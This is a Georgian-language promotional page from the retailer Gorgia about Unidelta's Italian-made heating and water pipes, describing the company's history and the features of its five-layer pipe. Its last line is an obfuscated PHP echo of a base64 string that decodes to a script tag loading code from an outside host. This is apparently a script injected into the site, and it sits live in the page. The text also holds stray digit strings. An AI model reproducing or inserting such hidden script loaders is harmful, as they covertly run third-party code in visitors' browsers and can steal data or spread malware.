gorgia
ავერსი jaluzi

51 წელი ბიზნესში და ექსპორტი 90-ზე მეტ ქვეყანაში - ეს უნიდელტაა. კომპანია 1973 წელს დაარსდა იტალიაში, ქალაქ ვესტონეში და თავდაპირველად სპეციალიზირდებოდა პოლიეთილენის მილების წარმოებაში. დღეს უნიდელტა ისეთ პროდუქციას აწარმოებს, რომელიც გამოიყენება სასმელი და სარწყავი წყლის სისტემებში, გათბობის სისტემებში და სხვა საინჟინრო ქსელებში.

კომპანიამ მალევე მოიპოვა წარმატება და დღეს მისი პროდუქცია გამოიყენება მთელ მსოფლიოში. Unidelta-ს პროდუქცია იტალიაშია დამზადებული და აკმაყოფილებს ISO 9001:2015 ხარისხის სტანდარტებს. უნიდელტა იმ ბრენდების კატეგორიას მიეკუთვნება, რომლებისთვისაც ხარისხი უპირველესია, შესაბამისად, თითოეული პროდუქტი ჩვენთან მოსვლამდე უამრავ შემოწმებას გადის. პროდუქცია სრულად და ექსკლუზიურად იწარმოება მათ საწარმოებში. რაც ყველაზე მნიშვნელოვანია, წარმოებული პქოდუქცია იტესტება და მხოლოდ ამის შემდეგ მიეწოდება მომხმარებლებს.

უნიდელტას ბრენდის ქვეშ შეხვდებით ისეთ მნიშვნელოვან მასალას, როგორიცაა მეტალოპლასტმასის შეფუთული მილი. ის მნიშვნელოვანია საყოფაცხოვრებო ცენტრალური გათბობის სისტემის გაკეთებისას. მისი გამოყენება უსაფრთხოა, არის პრაქტიკული და მარტივად დასამონტაჟებელი.

 9566154162626220000000000000000000000000000                65262632626251515454641551

პროდუქციის უპირატესობებია:

  • 5 ფენიანი მილი;
  • ფენები გამოირჩევა მაღალი ხარისხის წებოვნებით;
  • თითოეული ფენა გამოირჩევა მაღალი ტემპერატურისადმი მდგრადობით;
  • არის ანტიკოროზიული;
  • ინარჩუნებს ყველა თვისებას ხანგრძლივი დროის განმავლობაში;
  • შეიცავს მაღალი ხარისხის ალუმინის ორ ფენას;

უნიდელტას პროდუქცია 90-ზე მეტ ქვეყანაში გააქვს და კომპანია რეგულარულად მონაწიელობს ისეთ საერთაშორისო გამოფენებში, როგორებიცაა ISH Frankfurt და WETEX Dubai.

გორგია უნიდელტასთან 2014 წლიდან თანამშრომლობს. აღნიშნული ბრენდის პროდუქციის შეძენა შესაძლებელია გორგიას ყველა ფილიალში, ონლაინ- GORGIA.GE-ზე და ახლა უკვე აპლიკაციაშიც.

 

137
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");